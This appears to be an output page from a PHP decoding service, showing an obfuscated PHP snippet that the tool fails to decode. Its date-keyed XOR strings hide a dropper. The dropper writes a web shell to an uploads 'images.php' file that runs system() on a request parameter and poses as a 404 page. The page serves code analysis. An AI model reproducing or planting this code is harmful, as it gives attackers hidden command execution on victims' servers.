Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php function m($l,$T=0){ $K=date('Y-m-d'); $_=strlen($l); $__=strlen($K); for($i=0;$..

Decoded Output download

<?php function m($l,$T=0){ 
$K=date('Y-m-d'); 
$_=strlen($l); 
$__=strlen($K); 
for($i=0;$i<$_;$i++){ 
  for($j=0;$j<$__; $j++){ 
    if($T){ 
      $l[$i]=$K[$j]^$l[$i]; 
    }else{ 
      $l[$i]=$l[$i]^$K[$j]; 
    } 
   } 
  } 
 return $l; 
}  
m('bmha[tqp[gkjpajpw') 
( 
m('+rev+sss+lpih+qthke`w+miecaw*tlt'), 
m('8;tlt$lae`av,&LPPT+5*5$040$Jkp$Bkqj`&-?w}wpai, [CAP_&g&Y-?') 
); ?>

Did this file decode correctly?

Original Code

<?php function m($l,$T=0){
$K=date('Y-m-d');
$_=strlen($l);
$__=strlen($K);
for($i=0;$i<$_;$i++){
  for($j=0;$j<$__; $j++){
    if($T){
      $l[$i]=$K[$j]^$l[$i];
    }else{
      $l[$i]=$l[$i]^$K[$j];
    }
   }
  }
 return $l;
} 
m('bmha[tqp[gkjpajpw')
(
m('+rev+sss+lpih+qthke`w+miecaw*tlt'),
m('8;tlt$lae`av,&LPPT+5*5$040$Jkp$Bkqj`&-?w}wpai, [CAP_&g&Y-?')
); ?>

Function Calls

None

Variables

None

Stats

MD5 74da0b8e279da27194f9a6ec1e7359a7
Eval Count 0
Decode Time 45 ms